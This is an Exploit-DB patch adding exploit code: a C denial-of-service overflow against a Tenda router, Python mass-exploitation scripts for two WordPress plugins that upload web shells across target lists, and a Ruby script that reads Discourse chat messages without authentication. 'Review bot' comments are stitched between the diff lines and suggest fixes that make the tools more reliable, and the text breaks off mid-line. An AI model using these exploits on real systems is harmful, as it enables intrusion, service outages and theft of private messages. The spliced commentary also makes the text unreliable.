From 599853959f025a25ec375c6a532eec58c90790b7 Mon Sep 17 00:00:00 2001 
From: Exploit-DB Date: Wed, 23 Jul 2025 00:16:47 +0000 Subject: [PATCH] DB: 2025-07-23 13 changes to exploits/shellcodes/ghdb Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow Discourse 3.1.1 - Unauthenticated Chat Message Access Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE Simple File List WordPress Plugin 4.2.2 - File Upload to RCE Joomla JS Jobs plugin 1.4.2 - SQL injection LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS) --- exploits/multiple/remote/52374.c | 381 +++++++++++++++++++ exploits/multiple/webapps/52370.py | 90 +++++ exploits/multiple/webapps/52371.py | 103 ++++++ exploits/multiple/webapps/52375.rb | 565 +++++++++++++++++++++++++++++ exploits/php/webapps/52373.txt | 65 ++++ exploits/php/webapps/52376.txt | 32 ++ exploits/php/webapps/52377.txt | 33 ++ exploits/php/webapps/52378.txt | 35 ++ exploits/php/webapps/52379.txt | 32 ++ exploits/php/webapps/52380.txt | 30 ++ exploits/php/webapps/52381.txt | 34 ++ exploits/windows/remote/52372.txt | 235 ++++++++++++ files_exploits.csv | 12 + 13 files changed, 1647 insertions(+) create mode 100644 exploits/multiple/remote/52374.c create mode 100755 exploits/multiple/webapps/52370.py create mode 100755 exploits/multiple/webapps/52371.py create mode 100755 exploits/multiple/webapps/52375.rb create mode 100644 exploits/php/webapps/52373.txt create mode 100644 exploits/php/webapps/52376.txt create mode 100644 exploits/php/webapps/52377.txt create 
mode 100644 exploits/php/webapps/52378.txt
 create mode 100644 exploits/php/webapps/52379.txt
 create mode 100644 exploits/php/webapps/52380.txt
 create mode 100644 exploits/php/webapps/52381.txt
 create mode 100644 exploits/windows/remote/52372.txt
diff --git a/exploits/multiple/remote/52374.c b/exploits/multiple/remote/52374.c
new file mode 100644
index 000000000..aee470f54
--- /dev/null
+++ b/exploits/multiple/remote/52374.c
@@ -0,0 +1,381 @@ +/* + * Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow + * Author : Byte Reaper + * Telegram : @ByteReaper0 + * CVE : CVE-2025-7795 + * Vulnerability : Buffer Overflow + * Description : + * A buffer overflow vulnerability affecting certain Tenda routers, + * exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash. + */ + +#include +#include +#include +#include "argparse.h" +#include +#include +#include +#include + +#define FULL_URL 2500 +#define POST_DATA 10000 + +const char *targetUrl = NULL; +const char *targetip = NULL; +int selectIp = 0; +int selectUrl = 0; +int verbose = 0; +int showOne = 0; +char postData[POST_DATA]; + +struct Mem +{ + char *buffer; + size_t len; +}; + +size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) +{ + size_t total = size * nmemb; + struct Mem *m = (struct Mem *)userdata; + char *tmp = realloc(m->buffer, m->len + total + 1); + if (!tmp) return 0; + m->buffer = tmp; + memcpy(&(m->buffer[m->len]), ptr, total); + m->len += total; + m->buffer[m->len] = '\0'; + return total; +} + +void pingPacket() +{ + int pid = fork(); + printf("\n============================================== [Ping] ==============================================\n"); + if (pid < 0) + { + perror("\e[1;31m[-] Fork Failed!\e[0m"); + exit(1); + } + if (pid == 0) + { + printf("\e[1;32m[+] Child Process (Ping) -> PID: %d\e[0m\n", + getpid()); + char *const argv[] = { "/bin/ping", + "-c", + "3", + (char *)targetip, + NULL }; + char *const envp[] = { NULL }; + __asm__ volatile + ( + "mov $59, %%rax\n\t" + "mov %[prog], %%rdi\n\t" + "mov %[argv], %%rsi\n\t" + "mov %[envp], %%rdx\n\t" + "syscall\n\t" + "mov $60, %%rax\n\t" + "xor %%rdi, %%rdi\n\t" + "syscall\n\t" + : + : [prog] "r" (argv[0]), + [argv] "r" (argv), + [envp] "r" (envp) + : "rax", "rdi", "rsi", "rdx" + ); + } + else + { + printf("\e[1;32m[+] Main PID : %d\e[0m\n", + getpid()); + int status; + waitpid(pid, + &status, + 
0); + if (WIFEXITED(status)) + { + int code = WEXITSTATUS(status); + printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n", + code); + if (code == 0) + { + printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n"); + printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m"); + } + else + { + printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n"); + printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n"); + } + } + } + printf("\n============================================================================================\e[0m\n"); +} + +void sendRequest() +{ + CURL *c = curl_easy_init(); + CURLcode res; + char full[FULL_URL]; + struct Mem response = {NULL, 0}; + if (!c) { + printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n"); + exit(EXIT_FAILURE); + } + if (targetip) selectIp = 1; + if (targetUrl) selectUrl = 1; + if (selectIp) + { + snprintf(full, + sizeof(full), + "http://%s/goform/fromP2pListFilter", + targetip); + } + if (selectUrl) + { + snprintf(full, + sizeof(full), + "%s/goform/fromP2pListFilter", + targetUrl); + } + int rounds = 5; + int baseLen = 3500, step = 1000; + showOne = 1; + for (int i = 0; i < rounds; i++) + { + int len = baseLen + i * step; + if (len + 6 >= sizeof(postData)) break; + snprintf(postData, sizeof(postData), "list="); + memset(postData + 5, 'A', len); + postData[5 + len] = '\0'; + printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n", + i+1, + i+1, + len); + if (verbose) + { + printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n"); + printf("%s\e[0m\n\n", postData); + printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n"); + } + + curl_easy_reset(c); + curl_easy_setopt(c, + CURLOPT_URL, + full); + 
curl_easy_setopt(c, + CURLOPT_ACCEPT_ENCODING, + ""); + curl_easy_setopt(c, + CURLOPT_FOLLOWLOCATION, + 1L); + curl_easy_setopt(c, + CURLOPT_POST, + 1L); + curl_easy_setopt(c, + CURLOPT_POSTFIELDS, + postData); + curl_easy_setopt(c, + CURLOPT_POSTFIELDSIZE, + (long)strlen(postData)); + curl_easy_setopt(c, + CURLOPT_WRITEFUNCTION, + write_cb); + curl_easy_setopt(c, + CURLOPT_WRITEDATA, + &response); + curl_easy_setopt(c, + CURLOPT_CONNECTTIMEOUT, + 5L); + curl_easy_setopt(c, + CURLOPT_TIMEOUT, + 10L); + curl_easy_setopt(c, + CURLOPT_SSL_VERIFYPEER, + 0L); + curl_easy_setopt(c, + CURLOPT_SSL_VERIFYHOST, + 0L); + struct curl_slist *h = NULL; + h = curl_slist_append(h, + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); + h = curl_slist_append(h, + "Accept-Encoding: gzip, deflate, br"); + h = curl_slist_append(h, + "Accept-Language: en-US,en;q=0.5"); + h = curl_slist_append(h, + "Connection: keep-alive"); + h = curl_slist_append(h, + "Referer: http://example.com"); + h = curl_slist_append(h, + "Cache-Control: no-cache"); + h = curl_slist_append(h, + "Pragma: no-cache"); + curl_easy_setopt(c, CURLOPT_HTTPHEADER, h); + if (verbose) curl_easy_setopt(c, CURLOPT_VERBOSE, 1L); + + char *encode1 = curl_easy_escape(c, full, 0); + if (!encode1) + { + printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n"); + exit(EXIT_FAILURE); + } + if (verbose && showOne) + { + printf("\e[1;37m========================================="); + if (selectUrl) printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n", + targetUrl, + encode1, + full); + if (selectIp) printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n", + targetip, + full); + printf("========================================="); + showOne = 0; + } + res = curl_easy_perform(c); + curl_slist_free_all(h); + curl_free(encode1); + if (response.buffer) + { + free(response.buffer); + response.buffer = NULL; + response.len = 0; + } + if 
(res == CURLE_OK) + { + long httpCode = 0; + printf("\e[1;36m[+] Request sent successfully\e[0m\n"); + curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE, + &httpCode); + printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n", + httpCode); + if (httpCode >= 200 && httpCode < 300) + { + printf("\e[1;31m[-] The server was not affected, still working !\n"); + printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n"); + printf("%s\e[0m\n", + response.buffer); + printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n"); + } + else + { + printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n"); + printf("[+] Run Command Ping For Check Connection : \e[0m\n"); + if (selectIp) pingPacket(); + else printf("[-] Error Run Command Ping for URl !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n"); + } + } + else + { + printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n"); + printf("[-] Error : %s\n", curl_easy_strerror(res)); + } + } + free(response.buffer); + curl_easy_cleanup(c); +} + +int main(int argc, + const char **argv) +{ + printf( + "\e[1;31m" + "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n" + "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n" + "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌ \n" + " \e[1;37mByte Reaper\e[0m\n" + ); + printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n"); + if (getuid() != 0) + { + printf("===================================================\e[0m\n"); + printf("[-] Not running as root. Trying with sudo...\e[0m\n"); + + char *args[] = {(char*)"sudo", + (char*)"./exploit", + NULL}; + execvp("sudo", args); + + perror("[-] Error Run Exploit in Root !"); + __asm__ volatile + ( + "mov $0x3C, %%rax\n\t" + "xor %%rdi, %%rdi\n\t" + "syscall\n\t" + : + : + : "rdi" + ); + } + printf("\e[1;36m[+] Running as root! 
Exploit continues...\e[0m\n"); + printf("===================================================\e[0m\n"); + + struct argparse_option options[] = + { + OPT_HELP(), + OPT_STRING('i', + "ip", + &targetip, + "Enter Target IP"), + OPT_STRING('u', + "url", + &targetUrl, + "Enter Target URL"), + OPT_BOOLEAN('v', + "verbose", + &verbose, + "Verbose Mode"), + OPT_END(), + }; + + struct argparse argparse; + argparse_init(&argparse, + options, + NULL, + 0); + argparse_parse(&argparse, + argc, + argv); + + if (!targetip && !targetUrl) + { + printf("\e[1;33m[-] Please Enter Target IP OR URl !\e[0m\n"); + printf("\e[1;33m[!] Exemple : ./exploit -u http://ROUTER_IP\e[0m\n"); + printf("[+] OR \n"); + printf("\e[1;33m[!] Exemple : ./exploit -i ROUTER_IP\e[0m\n"); + __asm__ volatile( + "xor %%rdi, %%rdi\n\t" + "mov $0x3C, %%rax\n\t" + "1:\n\t" + "syscall\n\t" + : + : + : "rax", "rdi", "rsi" + ); + } + if (targetip && targetUrl) + { + printf("[+] Please Enter Traget URL OR Traget Ip address, Exit...\e[0m\n"); + __asm__ volatile + ( + "mov $0x3C, %%rax\n\t" + "xor %%rdi, %%rdi\n\t" + "syscall\n\t" + : + : + :"rdi" + ); + } + if (selectIp) + { + sendRequest(); + } + else + { + sendRequest(); + } + + + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/52370.py b/exploits/multiple/webapps/52370.py new file mode 100755 index 000000000..41ed38401 --- /dev/null +++ b/exploits/multiple/webapps/52370.py 
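Review bot: In sendRequest the response body is freed and reset to NULL immediately after curl_easy_perform, yet the 2xx branch that follows prints it with `printf("%s\e[0m\n", response.buffer)`, so that path hands a null pointer to `%s` (undefined behavior, a crash on most libcs); the free-and-reset block belongs after the `if (res == CURLE_OK)` block. main refuses to run unless uid is 0 and re-executes itself through `execvp("sudo", args)` with a hard-coded `./exploit` and none of the original arguments forwarded, although nothing here (libcurl, fork plus execve of /bin/ping) needs privileges, so least privilege argues for dropping the root check rather than escalating. The two arms of `if (selectIp)` in main both call `sendRequest()`, so the conditional is dead code. The "Vulnerability confirmed" verdict in pingPacket rests only on a non-2xx status followed by a lost ping, which a rate limit, firewall rule or reboot also produces, so the message should say the host stopped answering after the request rather than assert a confirmed overflow.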
@@ -0,0 +1,90 @@ +# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE +# Google Dork: inurl:/wp-content/plugins/pie-register/ +# Date: 2025-07-09 +# Exploit Author: Md Amanat Ullah (xSwads) +# Vendor Homepage: https://wordpress.org/plugins/pie-register/ +# Software Link: +https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip +# Version: <= 3.7.1.4 +# Tested on: Ubuntu 22.04 +# CVE: CVE-2025-34077 + +#!/usr/bin/env python3 +import requests +import zipfile +import io +import sys +from concurrent.futures import ThreadPoolExecutor, as_completed +from colorama import Fore, Style, init +from threading import Lock +init(autoreset=True) + +SHELL_PHP = "" +PLUGIN_DIR = "evilplugin" +ZIP_NAME = "evilplugin.zip" +SHELL_FILE = "shell.php" +OUTPUT_FILE = "Shells.txt" +HEADERS = {'User-Agent': 'Mozilla/5.0'} +TIMEOUT = 10 +lock = Lock() + +def FilterURLS(site): + site = site.strip() + if not site.startswith(('http://', 'https://')): + site = 'http://' + site + if not site.endswith('/'): + site += '/' + return site + +def make_shell_zip(): + buf = io.BytesIO() + with zipfile.ZipFile(buf, 'w') as z: + z.writestr(f"{PLUGIN_DIR}/{PLUGIN_DIR}.php", "") + z.writestr(f"{PLUGIN_DIR}/{SHELL_FILE}", SHELL_PHP) + buf.seek(0) + return buf + +def exploit(target): + target = FilterURLS(target) + session = requests.Session() + data = {"social_site": "true", "user_id_social_site": "1"} + try: + r = session.post(f"{target}?pr_social_login=1", data=data, headers=HEADERS, timeout=TIMEOUT) + except: + print(f"{Fore.RED}[Failed] - {target}") + return + + if not session.cookies: + print(f"{Fore.RED}[Failed] - {target}") + return + files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")} + try: + upload = session.post(f"{target}wp-admin/plugin-install.php?upload", files=files, headers=HEADERS, timeout=TIMEOUT) + except: + print(f"{Fore.RED}[Failed] - {target}") + return + + if "Plugin installed successfully" in upload.text: + shell_url = 
f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}" + print(f"{Fore.GREEN}[Exploited] - {shell_url}") + with lock: + with open(OUTPUT_FILE, "a") as f: + f.write(shell_url + "\n") + else: + print(f"{Fore.RED}[Failed] - {target}") + +def main(targets_file): + with open(targets_file, "r") as f: + targets = [line.strip() for line in f if line.strip()] + + with ThreadPoolExecutor(max_workers=100) as executor: + futures = [executor.submit(exploit, target) for target in targets] + for _ in as_completed(futures): + pass + +if __name__ == "__main__": + if len(sys.argv) != 2: + print(f"Usage: {sys.argv[0]} list.txt") + sys.exit(1) + + main(sys.argv[1]) \ No newline at end of file diff --git a/exploits/multiple/webapps/52371.py b/exploits/multiple/webapps/52371.py new file mode 100755 index 000000000..c065d4eac --- /dev/null +++ b/exploits/multiple/webapps/52371.py 
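Review bot: The `#!/usr/bin/env python3` line sits on line 12, after the comment header, so it is an ordinary comment and the executable mode (100755) gives the file no interpreter; move it to line 1. The same misplacement is in exploits/multiple/webapps/52371.py. Both bare `except:` clauses in exploit() also catch KeyboardInterrupt and SystemExit, which with a 100-worker pool means Ctrl-C is reported as "[Failed]" per task instead of stopping the run; narrow them to `except requests.RequestException:`. The `r` assigned from the first session.post is never read.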
@@ -0,0 +1,103 @@ +# Exploit Title: Simple File List WordPress Plugin 4.2.2 - File Upload to RCE +# Google Dork: inurl:/wp-content/plugins/simple-file-list/ +# Date: 2025-07-15 +# Exploit Author: Md Amanat Ullah (xSwads) +# Vendor Homepage: https://wordpress.org/plugins/simple-file-list/ +# Software Link: +https://downloads.wordpress.org/plugin/simple-file-list.4.2.2.zip +# Version: <= 4.2.2 +# Tested on: Ubuntu 22.04 +# CVE: CVE-2020-36847 + +#!/usr/bin/env python3 +import requests +import sys, os +from concurrent.futures import ThreadPoolExecutor, as_completed +from urllib.parse import urljoin +from colorama import Fore, init + +init(autoreset=True) + +HEADERS = {'User-Agent': 'Mozilla/5.0'} +PHP_PAYLOAD = "" +UPLOAD_PATH = "wp-content/plugins/simple-file-list/ee-upload-engine.php" +RENAME_PATH = "wp-content/plugins/simple-file-list/ee-file-engine.php" +UPLOAD_FOLDER = "wp-content/uploads/simple-file-list/" + +def FilterURLS(site): + site = site.strip() + if not site.startswith(('http://', 'https://')): + site = 'http://' + site + if not site.endswith('/'): + site += '/' + return site + +def upload_payload(base): + upload_url = urljoin(base, UPLOAD_PATH) + try: + files = {'file': ('pwn.png', PHP_PAYLOAD, 'image/png')} + r = requests.post(upload_url, files=files, headers=HEADERS, timeout=10, verify=False) + r.raise_for_status() + result = r.json() + return result.get('file') + except Exception: + return None + +def rename_payload(base, filename): + rename_url = urljoin(base, RENAME_PATH) + try: + new_name = filename[:-4] + '.php' + data = {'oldFile': filename, 'newFile': new_name} + r = requests.post(rename_url, data=data, headers=HEADERS, timeout=10, verify=False) + r.raise_for_status() + result = r.json() + return result.get('newFile') + except Exception: + return None + +def exploit(site): + base = FilterURLS(site) + try: + filename = upload_payload(base) + if not filename: + print(Fore.RED + f"[Failed] - {site}") + return + + newfile = rename_payload(base, 
filename) + if not newfile: + print(Fore.RED + f"[Failed] - {site}") + return + + shell_url = urljoin(base, UPLOAD_FOLDER + newfile) + r = requests.get(shell_url, headers=HEADERS, timeout=10, verify=False) + if r.status_code == 200: + print(Fore.GREEN + f"[Exploited] - {shell_url}") + with open("shells_found.txt", "a") as f: + f.write(shell_url + "\n") + else: + print(Fore.RED + f"[Failed] - {site}") + + except Exception: + print(Fore.RED + f"[Failed] - {site}") + +def main(): + if len(sys.argv) != 2: + print(f"Usage: {sys.argv[0]} list.txt") + sys.exit(1) + + targets_file = sys.argv[1] + if not os.path.isfile(targets_file): + print(f"File {targets_file} not found.") + sys.exit(1) + + with open(targets_file) as f: + targets = [line.strip() for line in f if line.strip()] + + with ThreadPoolExecutor(max_workers=100) as executor: + futures = [executor.submit(exploit, target) for target in targets] + for _ in as_completed(futures): + pass + +if __name__ == "__main__": + requests.packages.urllib3.disable_warnings() + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52375.rb b/exploits/multiple/webapps/52375.rb new file mode 100755 index 000000000..3eea5c7a1 --- /dev/null +++ b/exploits/multiple/webapps/52375.rb 
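Review bot: Every failure in upload_payload, rename_payload and exploit is collapsed by `except Exception:` into the same "[Failed]" line, so a local problem such as DNS resolution, a malformed entry in list.txt or a JSON decode error is indistinguishable from a non-vulnerable host; log `e` or narrow the clauses to `requests.RequestException` and `ValueError`. `verify=False` on every request together with `requests.packages.urllib3.disable_warnings()` (a deprecated alias path for `urllib3.disable_warnings()`) disables certificate validation process-wide, so the tool will also talk to any interposed host. Unlike 52370.py, the append to shells_found.txt is done from 100 threads without a lock; small appends are usually intact on Linux but this is not guaranteed, so a `threading.Lock` around the write is warranted.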
@@ -0,0 +1,565 @@ +#!/usr/bin/env ruby +# Title : Discourse 3.1.1 - Unauthenticated Chat Message Access +# CVE-2023-45131 +# CVSS: 7.5 (High) +# Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2 +# Author ibrahimsql @ https://twitter.com/ibrahmsql +# Date: 2023-12-14 + +require 'net/http' +require 'uri' +require 'json' +require 'openssl' +require 'base64' + +class CVE202345131 + def initialize(target_url) + @target_url = target_url.chomp('/') + @results = [] + @message_bus_client_id = nil + @csrf_token = nil + end + + def run_exploit + puts "\n[*] Testing CVE-2023-45131: Discourse Unauthenticated Chat Message Access" + puts "[*] Target: #{@target_url}" + puts "[*] CVSS Score: 7.5 (High)" + puts "[*] Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2\n" + + # Test MessageBus access + test_messagebus_access + test_chat_channel_enumeration + test_private_message_access + test_real_time_monitoring + test_message_history_access + test_user_enumeration_via_chat + + generate_report + @results + end + + private + + def test_messagebus_access + puts "[*] Testing MessageBus unauthenticated access..." + + begin + # Get MessageBus client ID + uri = URI("#{@target_url}/message-bus/poll") + + response = make_request(uri, 'GET') + + if response && response.code == '200' + begin + data = JSON.parse(response.body) + if data.is_a?(Array) && !data.empty? + @message_bus_client_id = extract_client_id(response) + + @results << { + vulnerability: "MessageBus Access", + severity: "High", + description: "Unauthenticated access to MessageBus endpoint confirmed", + impact: "Can monitor real-time messages and notifications", + client_id: @message_bus_client_id + } + puts "[+] MessageBus access confirmed - Client ID: #{@message_bus_client_id}" + return true + end + rescue JSON::ParserError + # Try alternative endpoints + test_alternative_messagebus_endpoints + end + end + rescue => e + puts "[!] 
Error testing MessageBus access: #{e.message}" + end + + false + end + + def test_alternative_messagebus_endpoints + puts "[*] Testing alternative MessageBus endpoints..." + + endpoints = [ + "/message-bus/poll", + "/message-bus/subscribe", + "/message-bus/diagnostics", + "/message-bus/long-poll" + ] + + endpoints.each do |endpoint| + begin + uri = URI("#{@target_url}#{endpoint}") + response = make_request(uri, 'GET') + + if response && response.code == '200' + if response.body.include?('message-bus') || response.body.include?('clientId') + @results << { + vulnerability: "Alternative MessageBus Endpoint", + severity: "Medium", + endpoint: endpoint, + description: "Alternative MessageBus endpoint accessible", + impact: "Potential message monitoring capability" + } + puts "[+] Alternative endpoint accessible: #{endpoint}" + end + end + rescue => e + puts "[!] Error testing endpoint #{endpoint}: #{e.message}" + end + end + end + + def test_chat_channel_enumeration + puts "[*] Testing chat channel enumeration..." + + return unless @message_bus_client_id + + begin + # Try to enumerate chat channels + uri = URI("#{@target_url}/message-bus/poll") + + # Subscribe to chat channels + data = { + '/chat/new-messages' => -1, + '/chat/channel-status' => -1, + '/chat/user-tracking' => -1, + 'clientId' => @message_bus_client_id + } + + response = make_request(uri, 'POST', data) + + if response && response.code == '200' + begin + messages = JSON.parse(response.body) + + if messages.is_a?(Array) && !messages.empty? + chat_channels = extract_chat_channels(messages) + + if !chat_channels.empty? + @results << { + vulnerability: "Chat Channel Enumeration", + severity: "High", + channels: chat_channels, + description: "Enumerated accessible chat channels", + impact: "Can identify active chat channels and participants" + } + puts "[+] Chat channels enumerated: #{chat_channels.join(', ')}" + end + end + rescue JSON::ParserError => e + puts "[!] 
Error parsing chat channel response: #{e.message}" + end + end + rescue => e + puts "[!] Error enumerating chat channels: #{e.message}" + end + end + + def test_private_message_access + puts "[*] Testing private message access..." + + return unless @message_bus_client_id + + begin + # Try to access private messages + uri = URI("#{@target_url}/message-bus/poll") + + # Subscribe to private message channels + data = { + '/private-messages' => -1, + '/chat/private' => -1, + '/notification' => -1, + 'clientId' => @message_bus_client_id + } + + response = make_request(uri, 'POST', data) + + if response && response.code == '200' + begin + messages = JSON.parse(response.body) + + if messages.is_a?(Array) + private_messages = extract_private_messages(messages) + + if !private_messages.empty? + @results << { + vulnerability: "Private Message Access", + severity: "Critical", + messages: private_messages, + description: "Accessed private chat messages without authentication", + impact: "Complete breach of private communication confidentiality" + } + puts "[+] Private messages accessed: #{private_messages.length} messages found" + + # Log sample messages (redacted) + private_messages.first(3).each_with_index do |msg, idx| + puts " [#{idx + 1}] #{redact_message(msg)}" + end + end + end + rescue JSON::ParserError => e + puts "[!] Error parsing private message response: #{e.message}" + end + end + rescue => e + puts "[!] Error accessing private messages: #{e.message}" + end + end + + def test_real_time_monitoring + puts "[*] Testing real-time message monitoring..." + + return unless @message_bus_client_id + + begin + puts "[*] Monitoring for 10 seconds..." 
+ + start_time = Time.now + monitored_messages = [] + + while (Time.now - start_time) < 10 + uri = URI("#{@target_url}/message-bus/poll") + + data = { + '/chat/new-messages' => 0, + 'clientId' => @message_bus_client_id + } + + response = make_request(uri, 'POST', data) + + if response && response.code == '200' + begin + messages = JSON.parse(response.body) + + if messages.is_a?(Array) && !messages.empty? + new_messages = extract_new_messages(messages) + monitored_messages.concat(new_messages) + end + rescue JSON::ParserError + # Continue monitoring + end + end + + sleep(1) + end + + if !monitored_messages.empty? + @results << { + vulnerability: "Real-time Message Monitoring", + severity: "High", + messages_count: monitored_messages.length, + description: "Successfully monitored real-time chat messages", + impact: "Can intercept live communications" + } + puts "[+] Real-time monitoring successful: #{monitored_messages.length} messages intercepted" + else + puts "[-] No real-time messages detected during monitoring period" + end + rescue => e + puts "[!] Error during real-time monitoring: #{e.message}" + end + end + + def test_message_history_access + puts "[*] Testing message history access..." 
+ + begin + # Try to access message history through various endpoints + history_endpoints = [ + "/chat/api/channels", + "/chat/api/messages", + "/chat/history", + "/api/chat/channels.json" + ] + + history_endpoints.each do |endpoint| + uri = URI("#{@target_url}#{endpoint}") + response = make_request(uri, 'GET') + + if response && response.code == '200' + begin + data = JSON.parse(response.body) + + if data.is_a?(Hash) && (data['messages'] || data['channels'] || data['chat']) + @results << { + vulnerability: "Message History Access", + severity: "High", + endpoint: endpoint, + description: "Accessed chat message history without authentication", + impact: "Historical chat data exposure" + } + puts "[+] Message history accessible via: #{endpoint}" + end + rescue JSON::ParserError + # Check for HTML responses that might contain chat data + if response.body.include?('chat') && response.body.include?('message') + @results << { + vulnerability: "Message History Exposure", + severity: "Medium", + endpoint: endpoint, + description: "Chat-related content found in response", + impact: "Potential information disclosure" + } + puts "[+] Chat-related content found in: #{endpoint}" + end + end + end + end + rescue => e + puts "[!] Error testing message history access: #{e.message}" + end + end + + def test_user_enumeration_via_chat + puts "[*] Testing user enumeration via chat features..." + + begin + # Try to enumerate users through chat-related endpoints + user_endpoints = [ + "/chat/api/users", + "/chat/users.json", + "/api/chat/users", + "/chat/members" + ] + + user_endpoints.each do |endpoint| + uri = URI("#{@target_url}#{endpoint}") + response = make_request(uri, 'GET') + + if response && response.code == '200' + begin + data = JSON.parse(response.body) + + if data.is_a?(Hash) && (data['users'] || data['members']) + users = extract_users_from_chat(data) + + if !users.empty? 
+ @results << { + vulnerability: "User Enumeration via Chat", + severity: "Medium", + endpoint: endpoint, + users_count: users.length, + sample_users: users.first(5), + description: "Enumerated chat users without authentication", + impact: "User information disclosure" + } + puts "[+] Users enumerated via #{endpoint}: #{users.length} users found" + end + end + rescue JSON::ParserError + # Continue with next endpoint + end + end + end + rescue => e + puts "[!] Error testing user enumeration: #{e.message}" + end + end + + def extract_client_id(response) + # Extract client ID from response headers or body + if response['X-MessageBus-Client-Id'] + return response['X-MessageBus-Client-Id'] + end + + # Try to extract from response body + begin + data = JSON.parse(response.body) + if data.is_a?(Hash) && data['clientId'] + return data['clientId'] + end + rescue JSON::ParserError + end + + # Generate a random client ID + SecureRandom.hex(16) + end + + def extract_chat_channels(messages) + channels = [] + + messages.each do |message| + if message.is_a?(Hash) + if message['channel'] && message['channel'].include?('/chat/') + channels << message['channel'] + elsif message['data'] && message['data'].is_a?(Hash) + if message['data']['channel_id'] + channels << "Channel #{message['data']['channel_id']}" + end + end + end + end + + channels.uniq + end + + def extract_private_messages(messages) + private_msgs = [] + + messages.each do |message| + if message.is_a?(Hash) + if message['channel'] && (message['channel'].include?('/private') || message['channel'].include?('/chat/private')) + private_msgs << { + channel: message['channel'], + data: message['data'], + timestamp: message['timestamp'] || Time.now.to_i + } + elsif message['data'] && message['data'].is_a?(Hash) + if message['data']['message'] || message['data']['content'] + private_msgs << { + content: message['data']['message'] || message['data']['content'], + user: message['data']['user'] || message['data']['username'], + 
timestamp: message['data']['timestamp'] || Time.now.to_i + } + end + end + end + end + + private_msgs + end + + def extract_new_messages(messages) + new_msgs = [] + + messages.each do |message| + if message.is_a?(Hash) && message['data'] + new_msgs << { + channel: message['channel'], + data: message['data'], + timestamp: Time.now.to_i + } + end + end + + new_msgs + end + + def extract_users_from_chat(data) + users = [] + + if data['users'] && data['users'].is_a?(Array) + data['users'].each do |user| + if user.is_a?(Hash) + users << { + username: user['username'], + id: user['id'], + name: user['name'] + } + end + end + elsif data['members'] && data['members'].is_a?(Array) + data['members'].each do |member| + if member.is_a?(Hash) + users << { + username: member['username'] || member['user'], + id: member['id'] || member['user_id'] + } + end + end + end + + users + end + + def redact_message(message) + if message.is_a?(Hash) + content = message[:content] || message['content'] || message[:data] || 'N/A' + user = message[:user] || message['user'] || 'Unknown' + "User: #{user}, Content: #{content.to_s[0..50]}..." + else + message.to_s[0..50] + "..." + end + end + + def make_request(uri, method = 'GET', data = nil, headers = {}) + begin + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = (uri.scheme == 'https') + http.verify_mode = OpenSSL::SSL::VERIFY_NONE if http.use_ssl? 
+ http.read_timeout = 10 + http.open_timeout = 10 + + request = case method.upcase + when 'GET' + Net::HTTP::Get.new(uri.request_uri) + when 'POST' + req = Net::HTTP::Post.new(uri.request_uri) + if data + if data.is_a?(Hash) + req.set_form_data(data) + else + req.body = data + req['Content-Type'] = 'application/json' + end + end + req + end + + # Set headers + request['User-Agent'] = 'Mozilla/5.0 (compatible; DiscourseMap/2.0)' + request['Accept'] = 'application/json, text/javascript, */*; q=0.01' + request['X-Requested-With'] = 'XMLHttpRequest' + headers.each { |key, value| request[key] = value } + + response = http.request(request) + return response + rescue => e + puts "[!] Request failed: #{e.message}" + return nil + end + end + + def generate_report + puts "\n" + "="*60 + puts "CVE-2023-45131 Exploitation Report" + puts "="*60 + puts "Target: #{@target_url}" + puts "Vulnerabilities Found: #{@results.length}" + + if @results.empty? + puts "[+] No chat message access vulnerabilities detected" + else + puts "\n[!] VULNERABILITIES DETECTED:" + @results.each_with_index do |result, index| + puts 